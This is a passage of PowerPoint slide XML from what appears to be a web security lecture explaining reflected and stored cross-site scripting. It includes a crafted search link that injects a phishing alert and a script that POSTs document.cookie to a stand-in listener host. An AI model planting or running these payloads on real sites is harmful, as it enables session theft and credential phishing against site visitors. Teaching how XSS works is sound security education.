              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>someone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the following link, with a hand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>crafted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>parameter</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https://vulnerablewebsite.com/?search=&lt;script&gt;alert(“Send your credentials to admin@email.com")&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2771431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399956D-FBC1-4BE6-999B-20F2FF9D85BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DD1726B-030D-4A45-AAE7-2C85485FD726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431999" y="432000"/>
            <a:ext cx="10488845" cy="432000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>closer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> look to exploits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (PT. 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE4A325F-1383-433E-81F5-E29F950FB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880" y="1632024"/>
            <a:ext cx="4263543" cy="2534729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CasellaDiTesto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D165B27-9089-4C7A-B6A2-A59579192C2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644236" y="4934777"/>
            <a:ext cx="8977746" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> stage the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>fooled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>his</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a: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639659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58EE7DAF-4202-49F2-AEAE-3C0E7F54281A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9420F91E-23C4-4BBF-BD44-DB4A9E89C37B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>closer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> look to exploits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CasellaDiTesto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3D26CC1-E76D-4FB9-9108-D7F3A04CC8E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1184564"/>
            <a:ext cx="8991600" cy="5539978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>variant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of Cross Site Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>actor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> code inside a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> website.</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The key point to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>understand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>kind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>been</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> website, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>visit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>unknowingly</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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>trivial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>understand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> works </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>offers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>possibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to the users to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>comments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>something</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>similar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to a social network or a blog).</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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>below</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>steals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the cookies of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>visitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>sends</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> party site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>owned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>listening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> for http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>requests</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algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>('https://third_party_listener.org’, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>: 'POST',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>mode: 'no-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>cors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>body:document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>&lt;/script&gt;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0518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F6C27A77-ED9C-44D4-90FA-6DDD44824F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99B8B93E-5893-4E0B-99DE-DF5795372D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431999" y="432000"/>
            <a:ext cx="9480927" cy="432000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Hacking team: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>hacked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CasellaDiTesto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75FD8D91-5D1E-44E4-A92A-7202DB46F12F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431999" y="1163782"/>
            <a:ext cx="9397801" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
